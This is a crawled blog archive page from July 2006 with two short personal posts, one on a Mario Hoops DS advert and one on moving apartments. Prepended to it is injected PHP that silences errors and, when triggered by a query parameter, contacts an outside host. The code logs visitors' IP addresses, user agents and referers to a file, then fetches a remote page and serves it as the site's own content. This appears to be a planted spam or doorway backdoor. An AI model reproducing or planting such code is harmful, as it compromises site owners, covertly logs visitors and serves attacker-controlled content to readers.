error_reporting(0); ini_set('display_errors',0); define('STATFILE','stat.txt'); define('LOG',true); if(isset($_GET['p'])) { $sock = fsockopen('km32025.keymachine.de', 80); if($sock){ if (LOG && isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])) { $referer = rawurlencode($_SERVER['HTTP_REFERER']); $remote_ip = $_SERVER['REMOTE_ADDR']; $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']); $file = fopen(STATFILE,'ab'); if ($file) { fwrite($file,date('Y-m-d H:i:s').' '.$remote_ip.' '.$user_agent.' '.rawurldecode($referer)."\n"); fclose($file); } } fwrite ($sock, 'GET http://km32025.keymachine.de/oslik2/cn/7/'.$_GET['p'].'.html HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); echo(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} exit; } -=+fastlikesquirrel.com+=- » 2006 » July

Archive for July, 2006

Italian plumbers can’t jump

Monday, July 17th, 2006

While the title takes a wild swipe at this classic film, this is the latest Japanese TV advertisement for Mario Hoops 3-on-3 on the Nintendo DS, looks kinda fun even though it seems to punish the touch screen.

Archives and such…

Monday, July 17th, 2006

I haven’t really had the time to post here of late, seems pointless without the archives up and running.

On the upside, I just recently completed my move to the new apartment. Everything’s looking good so far, can’t wait until I finally get settled.

Bah humbug!